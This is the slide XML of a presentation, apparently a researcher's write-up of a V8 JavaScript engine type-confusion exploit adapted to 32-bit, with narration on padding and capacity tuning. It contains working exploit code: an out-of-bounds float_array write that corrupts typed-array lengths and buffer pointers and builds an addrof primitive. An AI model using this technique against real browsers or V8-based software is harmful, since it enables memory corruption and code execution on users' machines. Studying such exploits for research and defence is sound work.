          <p:cNvPr id="10" name="날짜 개체 틀 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C78F7BB8-A988-4101-8962-14CB86A36EE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{ABBB06A6-7228-4D36-9AB9-A83B0EAFB929}" type="datetime1">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2019-11-28</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="250378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7" y="866181"/>
            <a:ext cx="11773257" cy="163121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sz="1000">
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Here's what I logged while debugging TypeConfusion to find out why the exploit code stopped.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>The following logging code makes me realize that building a NUMERIC_DICTIONARY_TYPE object is a keypoint and hangs due to capacity values.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>This is because I created a logging routine and changed the property value of the NUMERIC_DICTIONARY_TYPE object from time to time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>On the third day, the padding was correct and the capacity value could be set at the same time. In fact I tried to give up. But I was lucky.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Because it is luck to adjust both values at the same time. First of all, if you don't know the padding problem correctly, it will be very confusing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>If you notice that the padding changes every time you add a line of code, you'll find it easy. But until then, the analysis is in panic.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>This is because even if the capacity value is correct without correct padding, the result is not produced.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>You can fix the wrong capacity value again and this time the worst can happen if the padding is correct.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>In physics there is the term variable control(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0">
                <a:effectLst/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:effectLst/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>scientific constant)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>. This is the best physics term to describe this case.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>When trying to measure a value, do not put more than two variables at the same time(In physics terms it is called variable control. I am not a physicist. Don't get me wrong.).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="직사각형 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4AC6032-DA9D-4580-9375-C0B003A91FBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381110" y="3944726"/>
            <a:ext cx="3482382" cy="70788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If you build an object of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>NUMERIC_DICTIONARY_TYPE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>incorrectly, it will take a stuck in the "delete o[1];" code. I had to spend quite a bit of time correcting this value. Most of my analysis time was spent on this task.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="직사각형 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{404995EF-B9CA-407E-9B9E-1A11B5C7D095}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4005166" y="2636676"/>
            <a:ext cx="4869158" cy="4031873"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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[DEBUG][BEFORE][Object.seal(o)]  %DumpObjects(0, 11)");</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Object.seal(o);</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[DEBUG][AFTER][Object.seal(o)]  %DumpObjects(0, 11)");</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const v12 = {foo: 0x42424242};</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[DEBUG][BEFORE][Object.preventExtensions(v12)]  %DumpObjects(0, 11)");</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Object.preventExtensions(v12);</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[DEBUG][AFTER][Object.preventExtensions(v12)] %DumpObjects(0, 11)");</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[DEBUG][BEFORE][Object.seal(v12)] %DumpObjects(0, 11)");</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Object.seal(v12);</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console.log("==== [DEBUG][AFTER][Object.seal(v12)] %DumpObjects(0, 11)");</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%DumpObjects(o, 11);</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const v18 = {foo: Object};</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v12.__proto__ = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endPar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o[0] = 0x4242;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="8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rPr>
              <a:t>    delete o[1];</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="10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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFE29E52-2B96-4E82-ABBE-58B7866DE93F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8785687" y="4159389"/>
            <a:ext cx="3025203" cy="24622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defRPr sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B06030302020203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This value is the length of the corrupt float_array.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="직사각형 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B517F7E-7E27-4372-9766-1C92C2FA278A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4251051" y="6212717"/>
            <a:ext cx="787232" cy="139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연결선: 꺾임 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{810C048D-45CA-4DBC-9899-A6C8F581FEF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="8" idx="2"/>
            <a:endCxn id="9" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6729879" y="2714014"/>
            <a:ext cx="1876815" cy="5260006"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">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DA497E1-B000-4529-A911-08A8FFDC8F2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611942" y="129722"/>
            <a:ext cx="6430755"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PoC description modified to work with 32-bit</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400">
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="직사각형 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC646A4C-BC07-4C47-8101-A7771F53215E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381110" y="3533718"/>
            <a:ext cx="3482382" cy="40011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See the printouts in chapters 9 and 10 of this ppt document.ocument.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="슬라이드 번호 개체 틀 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D78414BF-8614-4B76-B737-1DD1E268D82F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F3ECD9F8-CFA2-4FC9-86A0-B66D202A3856}" type="slidenum">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>/23</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="날짜 개체 틀 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D46B66F-5F69-4F27-80CB-DD1BDADCC97A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B065642B-6528-40EB-A336-71ED57063C63}" type="datetime1">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2019-11-28</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1575931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8" y="866181"/>
            <a:ext cx="11773257" cy="52322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a:t>The following code is executed assuming that OOB succeeds when "float_array[2]" is accessed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>This code manipulates the objects declared after the float_array variable.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="직사각형 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4AC6032-DA9D-4580-9375-C0B003A91FBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="297306" y="4545045"/>
            <a:ext cx="11626229" cy="10618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900">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>You will have no difficulty understanding the code. I only point to you a few things. Index items in float_array are treated as 8 bytes by default.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Therefore I print high 4 byte and low 4 byte separately. Therefore, don't confuse the index number of float_array.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Basically, an index item of float_array should be thought of as a 8 byte "FIXED_DOUBLE_ARRAY_TYPE" value.  Not necessarily, but you should think so and approach the problem as much as possible.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Also, the pointer address of any object you get with "addrof" must be -1. This is because the pointer addresses stored in v8 memory all add up to +1. I already showed it all. (See chapter 11.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>I'll say it again, if you add or subtract a single line to this code I’ve shown it, the padding will be different and won't work. I'm not talking about a passage from the Bible.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(It’s a joke. Is it fun? Deuteronomy 12:32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.biblegateway.com/passage/?search=Deuteronomy+12%3A32&amp;version=KJV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
                <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>You have to worry about padding every time you modify and save one line of code each time. Keep reminding it..!!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADA497E1-B000-4529-A911-08A8FFDC8F2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611942" y="129722"/>
            <a:ext cx="6430755"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PoC description modified to work with 32-bit</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400">
              <a:latin typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
              <a:cs typeface="Clear Sans Medium" panose="020B0603030202020304" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="직사각형 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50C7A2AB-423F-4A49-99B9-95F1F6B97034}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="297306" y="1421342"/>
            <a:ext cx="4642649" cy="3231654"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    if (float_array[2] !== undefined) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        this.exploited = true;</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console.log('[+][EXPLOIT_MEMDUMP] ============================================================');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        console.log('[+][BEFORE] float_array[4]: ' + float_array[4].float_to_low_32bit().toString(16));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        console.log('[+][BEFORE] float_array[4]: ' + float_array[4].float_to_high_32bit().toString(16));</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float_array[3] = float_array[3].setHighUint32(0xC8C8n);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        float_array[4] = float_array[4].setLowUint32(0xC8C8n);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        float_array[15] = float_array[15].setHighUint32(0xC8C8n);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        float_array[15] = float_array[15].setLowUint32(0xC8C8n);</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 tarr3.byteLength</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        float_array[26] = float_array[26].setHighUint32(0xC8C8n);</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 view.byteLength</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        float_array[41] = float_array[41].setHighUint32(0xC8C8n);</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 tarr3.buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        obj_addrof['b'] = tarr3.buffer;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        console.log('[+] addrof(45): ' + (float_array[45].float_to_high_32bit() - 1n).toString(16));</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 float_array[31] = float_array[31].setHighUint32((float_array[45].float_to_high_32bit() - 1n + 12n + 28n));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        float_array[26] = float_array[26].setHighUint32(0x04040404n);</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console.log('[+][EXPLOIT_MEMDUMP] ============================================================');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        console.log('[+][AFTER] float_array[4]: ' + float_array[4].float_to_low_32bit().toString(16));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        console.log('[+][AFTER] float_array[4]: ' + float_array[4].float_to_high_32bit().toString(16));</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console.log('[+][VERIFY_RESULT_LENGTH] =======================================================');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        console.log('[+][RESULT] tarr.length: ' + tarr.length);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>        console.log('[+][RESULT] tarr.byteLength: ' + tarr.byteLength);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
